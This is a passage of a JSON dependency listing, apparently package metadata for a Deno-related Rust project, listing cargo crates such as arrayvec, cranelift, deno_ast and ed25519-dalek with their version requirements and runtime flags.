false,"kind":"runtime","optional":false},{"id":25970002500,"package_name":"arrayref","ecosystem":"cargo","requirements":"0.3.9","direct":false,"kind":"runtime","optional":false},{"id":25970002502,"package_name":"arrayvec","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970002505,"package_name":"ascii","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002507,"package_name":"ash","ecosystem":"cargo","requirements":"0.38.0+1.3.281","direct":false,"kind":"runtime","optional":false},{"id":25970002509,"package_name":"asn1-rs","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970002511,"package_name":"asn1-rs-derive","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002513,"package_name":"asn1-rs-impl","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002516,"package_name":"ast_node","ecosystem":"cargo","requirements":"5.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002518,"package_name":"async-compression","ecosystem":"cargo","requirements":"0.4.11","direct":false,"kind":"runtime","optional":false},{"id":25970002520,"package_name":"async-executor","ecosystem":"cargo","requirements":"1.13.3","direct":false,"kind":"runtime","optional":false},{"id":25970002521,"package_name":"async-io","ecosystem":"cargo","requirements":"2.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002524,"package_name":"async-once-cell","ecosystem":"cargo","requirements":"0.5.4","direct":false,"kind":"runtime","optional":false},{"id":25970002526,"package_name":"async-stream","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970002528,"package_name":"async-stream-impl","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970002531,"package_name":"async-task","ecosystem":"cargo","requirements":"4.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002532,"package_name":"async-trait","ecosystem":"cargo","requirements":"0.1.88","direct":false,"kind":"runtime","optional":false},{"id":25970002534,"package_name":"asynchronous-codec","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970002536,"package_name":"atomic-waker","ecosystem":"cargo","requirements":"1.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970002538,"package_name":"auto_impl","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002540,"package_name":"autocfg","ecosystem":"cargo","requirements":"1.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002542,"package_name":"aws-lc-rs","ecosystem":"cargo","requirements":"1.16.3","direct":false,"kind":"runtime","optional":false},{"id":25970002544,"package_name":"aws-lc-sys","ecosystem":"cargo","requirements":"0.40.0","direct":false,"kind":"runtime","optional":false},{"id":25970002546,"package_name":"az","ecosystem":"cargo","requirements":"1.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002548,"package_name":"backhand","ecosystem":"cargo","requirements":"0.25.1","direct":false,"kind":"runtime","optional":false},{"id":25970002550,"package_name":"backtrace","ecosystem":"cargo","requirements":"0.3.74","direct":false,"kind":"runtime","optional":false},{"id":25970002552,"package_name":"base16ct","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002555,"package_name":"base16ct","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002556,"package_name":"base64","ecosystem":"cargo","requirements":"0.21.7","direct":false,"kind":"runtime","optional":false},{"id":25970002558,"package_name":"base64","ecosystem":"cargo","requirements":"0.22.1","direct":false,"kind":"runtime","optional":false},{"id":25970002559,"package_name":"base64-simd","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002561,"package_name":"base64ct","ecosystem":"cargo","requirements":"1.8.3","direct":false,"kind":"runtime","optional":false},{"id":25970002563,"package_name":"bencher","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970002592,"package_name":"better_scoped_tls","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002593,"package_name":"bincode","ecosystem":"cargo","requirements":"1.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970002594,"package_name":"bindgen","ecosystem":"cargo","requirements":"0.70.1","direct":false,"kind":"runtime","optional":false},{"id":25970002595,"package_name":"bindgen","ecosystem":"cargo","requirements":"0.71.1","direct":false,"kind":"runtime","optional":false},{"id":25970002596,"package_name":"bindgen","ecosystem":"cargo","requirements":"0.72.1","direct":false,"kind":"runtime","optional":false},{"id":25970002597,"package_name":"bit-set","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002598,"package_name":"bit-set","ecosystem":"cargo","requirements":"0.9.1","direct":false,"kind":"runtime","optional":false},{"id":25970002599,"package_name":"bit-vec","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002600,"package_name":"bit-vec","ecosystem":"cargo","requirements":"0.9.1","direct":false,"kind":"runtime","optional":false},{"id":25970002601,"package_name":"bitflags","ecosystem":"cargo","requirements":"1.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970002602,"package_name":"bitflags","ecosystem":"cargo","requirements":"2.9.3","direct":false,"kind":"runtime","optional":false},{"id":25970002603,"package_name":"bitvec","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002604,"package_name":"blake2","ecosystem":"cargo","requirements":"0.10.6","direct":false,"kind":"runtime","optional":false},{"id":25970002605,"package_name":"blake2","ecosystem":"cargo","requirements":"0.11.0-rc.6","direct":false,"kind":"runtime","optional":false},{"id":25970002606,"package_name":"block-buffer","ecosystem":"cargo","requirements":"0.10.4","direct":false,"kind":"runtime","optional":false},{"id":25970002607,"package_name":"block-buffer","ecosystem":"cargo","requirements":"0.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970002608,"package_name":"block-padding","ecosystem":"cargo","requirements":"0.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970002609,"package_name":"block2","ecosystem":"cargo","requirements":"0.6.2","direct":false,"kind":"runtime","optional":false},{"id":25970002610,"package_name":"borrow-or-share","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970002611,"package_name":"boxed_error","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002612,"package_name":"brotli","ecosystem":"cargo","requirements":"6.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002613,"package_name":"brotli-decompressor","ecosystem":"cargo","requirements":"4.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002614,"package_name":"bsdiff","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002615,"package_name":"bstr","ecosystem":"cargo","requirements":"1.9.1","direct":false,"kind":"runtime","optional":false},{"id":25970002616,"package_name":"bumpalo","ecosystem":"cargo","requirements":"3.19.0","direct":false,"kind":"runtime","optional":false},{"id":25970002617,"package_name":"bytemuck","ecosystem":"cargo","requirements":"1.24.0","direct":false,"kind":"runtime","optional":false},{"id":25970002618,"package_name":"bytemuck_derive","ecosystem":"cargo","requirements":"1.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970002619,"package_name":"byteorder","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002620,"package_name":"byteorder-lite","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002621,"package_name":"bytes","ecosystem":"cargo","requirements":"1.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970002622,"package_name":"bytes-str","ecosystem":"cargo","requirements":"0.2.7","direct":false,"kind":"runtime","optional":false},{"id":25970002623,"package_name":"bzip2","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970002624,"package_name":"cab","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002625,"package_name":"calendrical_calculations","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970002626,"package_name":"capacity_builder","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002627,"package_name":"capacity_builder_macros","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002628,"package_name":"caseless","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002629,"package_name":"cast","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002630,"package_name":"castaway","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002631,"package_name":"cbc","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970002632,"package_name":"cc","ecosystem":"cargo","requirements":"1.2.56","direct":false,"kind":"runtime","optional":false},{"id":25970002633,"package_name":"cdivsufsort","ecosystem":"cargo","requirements":"2.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002634,"package_name":"cexpr","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002635,"package_name":"cfb","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970002636,"package_name":"cfg-if","ecosystem":"cargo","requirements":"1.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970002637,"package_name":"cfg_aliases","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002638,"package_name":"chacha20","ecosystem":"cargo","requirements":"0.10.1","direct":false,"kind":"runtime","optional":false},{"id":25970002639,"package_name":"chrono","ecosystem":"cargo","requirements":"0.4.42","direct":false,"kind":"runtime","optional":false},{"id":25970002640,"package_name":"ciborium","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002641,"package_name":"ciborium-io","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002642,"package_name":"ciborium-ll","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002643,"package_name":"cipher","ecosystem":"cargo","requirements":"0.4.4","direct":false,"kind":"runtime","optional":false},{"id":25970002644,"package_name":"clang-sys","ecosystem":"cargo","requirements":"1.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970002645,"package_name":"clap","ecosystem":"cargo","requirements":"4.5.56","direct":false,"kind":"runtime","optional":false},{"id":25970002646,"package_name":"clap_builder","ecosystem":"cargo","requirements":"4.5.56","direct":false,"kind":"runtime","optional":false},{"id":25970002647,"package_name":"clap_lex","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970002648,"package_name":"clipboard-win","ecosystem":"cargo","requirements":"5.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002649,"package_name":"cmake","ecosystem":"cargo","requirements":"0.1.57","direct":false,"kind":"runtime","optional":false},{"id":25970002650,"package_name":"cmov","ecosystem":"cargo","requirements":"0.5.4","direct":false,"kind":"runtime","optional":false},{"id":25970002651,"package_name":"codespan-reporting","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970002652,"package_name":"color-print","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970002653,"package_name":"color-print-proc-macro","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970002654,"package_name":"color_quant","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002655,"package_name":"colorchoice","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002656,"package_name":"compact_str","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002657,"package_name":"comrak","ecosystem":"cargo","requirements":"0.29.0","direct":false,"kind":"runtime","optional":false},{"id":25970002658,"package_name":"concurrent-queue","ecosystem":"cargo","requirements":"2.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002659,"package_name":"condtype","ecosystem":"cargo","requirements":"1.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002660,"package_name":"console","ecosystem":"cargo","requirements":"0.15.11","direct":false,"kind":"runtime","optional":false},{"id":25970002661,"package_name":"console_static_text","ecosystem":"cargo","requirements":"0.8.3","direct":false,"kind":"runtime","optional":false},{"id":25970002662,"package_name":"const-hex","ecosystem":"cargo","requirements":"1.19.1","direct":false,"kind":"runtime","optional":false},{"id":25970002663,"package_name":"const-oid","ecosystem":"cargo","requirements":"0.9.6","direct":false,"kind":"runtime","optional":false},{"id":25970002664,"package_name":"const-oid","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970002665,"package_name":"convert_case","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002666,"package_name":"cooked-waker","ecosystem":"cargo","requirements":"5.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002667,"package_name":"core-foundation","ecosystem":"cargo","requirements":"0.9.4","direct":false,"kind":"runtime","optional":false},{"id":25970002668,"package_name":"core-foundation","ecosystem":"cargo","requirements":"0.10.1","direct":false,"kind":"runtime","optional":false},{"id":25970002669,"package_name":"core-foundation-sys","ecosystem":"cargo","requirements":"0.8.6","direct":false,"kind":"runtime","optional":false},{"id":25970002670,"package_name":"core_maths","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970002671,"package_name":"countme","ecosystem":"cargo","requirements":"3.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002672,"package_name":"cpubits","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002673,"package_name":"cpufeatures","ecosystem":"cargo","requirements":"0.2.12","direct":false,"kind":"runtime","optional":false},{"id":25970002674,"package_name":"cpufeatures","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002675,"package_name":"cranelift","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002676,"package_name":"cranelift-assembler-x64","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002677,"package_name":"cranelift-assembler-x64-meta","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002678,"package_name":"cranelift-bforest","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002679,"package_name":"cranelift-bitset","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002680,"package_name":"cranelift-codegen","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002681,"package_name":"cranelift-codegen-meta","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002682,"package_name":"cranelift-codegen-shared","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002683,"package_name":"cranelift-control","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002684,"package_name":"cranelift-entity","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002685,"package_name":"cranelift-frontend","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002686,"package_name":"cranelift-isle","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002687,"package_name":"cranelift-module","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002688,"package_name":"cranelift-native","ecosystem":"cargo","requirements":"0.117.2","direct":false,"kind":"runtime","optional":false},{"id":25970002689,"package_name":"crc32fast","ecosystem":"cargo","requirements":"1.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970002690,"package_name":"criterion","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970002691,"package_name":"criterion-plot","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002692,"package_name":"critical-section","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002693,"package_name":"crossbeam-channel","ecosystem":"cargo","requirements":"0.5.15","direct":false,"kind":"runtime","optional":false},{"id":25970002694,"package_name":"crossbeam-deque","ecosystem":"cargo","requirements":"0.8.5","direct":false,"kind":"runtime","optional":false},{"id":25970002695,"package_name":"crossbeam-epoch","ecosystem":"cargo","requirements":"0.9.18","direct":false,"kind":"runtime","optional":false},{"id":25970002696,"package_name":"crossbeam-queue","ecosystem":"cargo","requirements":"0.3.12","direct":false,"kind":"runtime","optional":false},{"id":25970002697,"package_name":"crossbeam-utils","ecosystem":"cargo","requirements":"0.8.21","direct":false,"kind":"runtime","optional":false},{"id":25970002698,"package_name":"crossterm","ecosystem":"cargo","requirements":"0.28.1","direct":false,"kind":"runtime","optional":false},{"id":25970002699,"package_name":"crossterm_winapi","ecosystem":"cargo","requirements":"0.9.1","direct":false,"kind":"runtime","optional":false},{"id":25970002700,"package_name":"crunchy","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970002701,"package_name":"crypto-bigint","ecosystem":"cargo","requirements":"0.5.5","direct":false,"kind":"runtime","optional":false},{"id":25970002702,"package_name":"crypto-bigint","ecosystem":"cargo","requirements":"0.7.0-rc.28","direct":false,"kind":"runtime","optional":false},{"id":25970002703,"package_name":"crypto-common","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970002704,"package_name":"crypto-common","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002705,"package_name":"cssparser","ecosystem":"cargo","requirements":"0.36.0","direct":false,"kind":"runtime","optional":false},{"id":25970002706,"package_name":"cssparser-macros","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970002707,"package_name":"ctr","ecosystem":"cargo","requirements":"0.9.2","direct":false,"kind":"runtime","optional":false},{"id":25970002708,"package_name":"ctutils","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002709,"package_name":"curve25519-dalek","ecosystem":"cargo","requirements":"4.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970002710,"package_name":"curve25519-dalek-derive","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970002711,"package_name":"darling","ecosystem":"cargo","requirements":"0.20.10","direct":false,"kind":"runtime","optional":false},{"id":25970002712,"package_name":"darling","ecosystem":"cargo","requirements":"0.21.3","direct":false,"kind":"runtime","optional":false},{"id":25970002713,"package_name":"darling_core","ecosystem":"cargo","requirements":"0.20.10","direct":false,"kind":"runtime","optional":false},{"id":25970002714,"package_name":"darling_core","ecosystem":"cargo","requirements":"0.21.3","direct":false,"kind":"runtime","optional":false},{"id":25970002715,"package_name":"darling_macro","ecosystem":"cargo","requirements":"0.20.10","direct":false,"kind":"runtime","optional":false},{"id":25970002716,"package_name":"darling_macro","ecosystem":"cargo","requirements":"0.21.3","direct":false,"kind":"runtime","optional":false},{"id":25970002717,"package_name":"dashmap","ecosystem":"cargo","requirements":"5.5.3","direct":false,"kind":"runtime","optional":false},{"id":25970002718,"package_name":"data-encoding","ecosystem":"cargo","requirements":"2.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002719,"package_name":"data-url","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002720,"package_name":"dbus","ecosystem":"cargo","requirements":"0.9.7","direct":false,"kind":"runtime","optional":false},{"id":25970002721,"package_name":"dbus-secret-service","ecosystem":"cargo","requirements":"4.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970002722,"package_name":"debugid","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002723,"package_name":"deku","ecosystem":"cargo","requirements":"0.20.3","direct":false,"kind":"runtime","optional":false},{"id":25970002724,"package_name":"deku_derive","ecosystem":"cargo","requirements":"0.20.3","direct":false,"kind":"runtime","optional":false},{"id":25970002725,"package_name":"deno-tower-lsp-macros","ecosystem":"cargo","requirements":"0.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970002726,"package_name":"deno_ast","ecosystem":"cargo","requirements":"0.53.3","direct":false,"kind":"runtime","optional":false},{"id":25970002727,"package_name":"deno_core_icudata","ecosystem":"cargo","requirements":"0.77.0","direct":false,"kind":"runtime","optional":false},{"id":25970002728,"package_name":"deno_doc","ecosystem":"cargo","requirements":"0.202.0","direct":false,"kind":"runtime","optional":false},{"id":25970002729,"package_name":"deno_error","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002730,"package_name":"deno_error_macro","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002731,"package_name":"deno_graph","ecosystem":"cargo","requirements":"0.110.1","direct":false,"kind":"runtime","optional":false},{"id":25970002732,"package_name":"deno_lint","ecosystem":"cargo","requirements":"0.84.1","direct":false,"kind":"runtime","optional":false},{"id":25970002768,"package_name":"deno_media_type","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002769,"package_name":"deno_native_certs","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002770,"package_name":"deno_panic","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002783,"package_name":"deno_path_util","ecosystem":"cargo","requirements":"0.6.4","direct":false,"kind":"runtime","optional":false},{"id":25970002784,"package_name":"deno_semver","ecosystem":"cargo","requirements":"0.10.1","direct":false,"kind":"runtime","optional":false},{"id":25970002793,"package_name":"deno_task_shell","ecosystem":"cargo","requirements":"0.33.3","direct":false,"kind":"runtime","optional":false},{"id":25970002794,"package_name":"deno_terminal","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002795,"package_name":"deno_tower_lsp","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002796,"package_name":"deno_tunnel","ecosystem":"cargo","requirements":"0.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970002797,"package_name":"deno_unsync","ecosystem":"cargo","requirements":"0.4.4","direct":false,"kind":"runtime","optional":false},{"id":25970002798,"package_name":"deno_whoami","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002799,"package_name":"denokv_proto","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970002800,"package_name":"denokv_remote","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970002801,"package_name":"denokv_sqlite","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970002802,"package_name":"der","ecosystem":"cargo","requirements":"0.7.9","direct":false,"kind":"runtime","optional":false},{"id":25970002803,"package_name":"der","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002804,"package_name":"der-parser","ecosystem":"cargo","requirements":"8.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002805,"package_name":"der_derive","ecosystem":"cargo","requirements":"0.7.3","direct":false,"kind":"runtime","optional":false},{"id":25970002806,"package_name":"deranged","ecosystem":"cargo","requirements":"0.5.6","direct":false,"kind":"runtime","optional":false},{"id":25970002807,"package_name":"derive-io","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002808,"package_name":"derive-io-macros","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002809,"package_name":"derive_arbitrary","ecosystem":"cargo","requirements":"1.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002810,"package_name":"derive_builder","ecosystem":"cargo","requirements":"0.20.2","direct":false,"kind":"runtime","optional":false},{"id":25970002811,"package_name":"derive_builder_core","ecosystem":"cargo","requirements":"0.20.2","direct":false,"kind":"runtime","optional":false},{"id":25970002812,"package_name":"derive_builder_macro","ecosystem":"cargo","requirements":"0.20.2","direct":false,"kind":"runtime","optional":false},{"id":25970002813,"package_name":"derive_more","ecosystem":"cargo","requirements":"0.99.17","direct":false,"kind":"runtime","optional":false},{"id":25970002814,"package_name":"des","ecosystem":"cargo","requirements":"0.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970002815,"package_name":"deunicode","ecosystem":"cargo","requirements":"1.4.3","direct":false,"kind":"runtime","optional":false},{"id":25970002816,"package_name":"dhat","ecosystem":"cargo","requirements":"0.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970002817,"package_name":"diff","ecosystem":"cargo","requirements":"0.1.13","direct":false,"kind":"runtime","optional":false},{"id":25970002818,"package_name":"digest","ecosystem":"cargo","requirements":"0.10.7","direct":false,"kind":"runtime","optional":false},{"id":25970002819,"package_name":"digest","ecosystem":"cargo","requirements":"0.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970002820,"package_name":"diplomat","ecosystem":"cargo","requirements":"0.15.0","direct":false,"kind":"runtime","optional":false},{"id":25970002821,"package_name":"diplomat-runtime","ecosystem":"cargo","requirements":"0.15.1","direct":false,"kind":"runtime","optional":false},{"id":25970002822,"package_name":"diplomat_core","ecosystem":"cargo","requirements":"0.15.0","direct":false,"kind":"runtime","optional":false},{"id":25970002823,"package_name":"dispatch2","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002824,"package_name":"displaydoc","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970002825,"package_name":"divan","ecosystem":"cargo","requirements":"0.1.21","direct":false,"kind":"runtime","optional":false},{"id":25970002826,"package_name":"divan-macros","ecosystem":"cargo","requirements":"0.1.21","direct":false,"kind":"runtime","optional":false},{"id":25970002827,"package_name":"dlib","ecosystem":"cargo","requirements":"0.5.3","direct":false,"kind":"runtime","optional":false},{"id":25970002828,"package_name":"dlopen2","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970002829,"package_name":"dlopen2_derive","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002830,"package_name":"document-features","ecosystem":"cargo","requirements":"0.2.10","direct":false,"kind":"runtime","optional":false},{"id":25970002831,"package_name":"dprint-core","ecosystem":"cargo","requirements":"0.67.4","direct":false,"kind":"runtime","optional":false},{"id":25970002833,"package_name":"dprint-core-macros","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002834,"package_name":"dprint-plugin-json","ecosystem":"cargo","requirements":"0.21.3","direct":false,"kind":"runtime","optional":false},{"id":25970002835,"package_name":"dprint-plugin-jupyter","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002836,"package_name":"dprint-plugin-markdown","ecosystem":"cargo","requirements":"0.20.0","direct":false,"kind":"runtime","optional":false},{"id":25970002837,"package_name":"dprint-plugin-typescript","ecosystem":"cargo","requirements":"0.96.1","direct":false,"kind":"runtime","optional":false},{"id":25970002838,"package_name":"dprint-swc-ext","ecosystem":"cargo","requirements":"0.26.0","direct":false,"kind":"runtime","optional":false},{"id":25970002839,"package_name":"dsa","ecosystem":"cargo","requirements":"0.6.3","direct":false,"kind":"runtime","optional":false},{"id":25970002840,"package_name":"dtoa","ecosystem":"cargo","requirements":"1.0.10","direct":false,"kind":"runtime","optional":false},{"id":25970002841,"package_name":"dtoa-short","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970002842,"package_name":"dunce","ecosystem":"cargo","requirements":"1.0.5","direct":false,"kind":"runtime","optional":false},{"id":25970002843,"package_name":"ecb","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970002844,"package_name":"ecdsa","ecosystem":"cargo","requirements":"0.16.9","direct":false,"kind":"runtime","optional":false},{"id":25970002845,"package_name":"ecow","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002846,"package_name":"ed25519","ecosystem":"cargo","requirements":"2.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002847,"package_name":"ed25519-dalek","ecosystem":"cargo","requirements":"2.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970002848,"package_name":"ed448","ecosystem":"cargo","requirements":"0.5.0-rc.5","direct":false,"kind":"runtime","optional":false},{"id":25970002849,"package_name":"ed448-goldilocks","ecosystem":"cargo","requirements":"0.14.0-pre.10","direct":false,"kind":"runtime","optional":false},{"id":25970002850,"package_name":"either","ecosystem":"cargo","requirements":"1.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970002851,"package_name":"elliptic-curve","ecosystem":"cargo","requirements":"0.13.8","direct":false,"kind":"runtime","optional":false},{"id":25970002852,"package_name":"elliptic-curve","ecosystem":"cargo","requirements":"0.14.0-rc.28","direct":false,"kind":"runtime","optional":false},{"id":25970002853,"package_name":"encode_unicode","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002854,"package_name":"encoding_rs","ecosystem":"cargo","requirements":"0.8.35","direct":false,"kind":"runtime","optional":false},{"id":25970002855,"package_name":"endian-type","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970002856,"package_name":"entities","ecosystem":"carg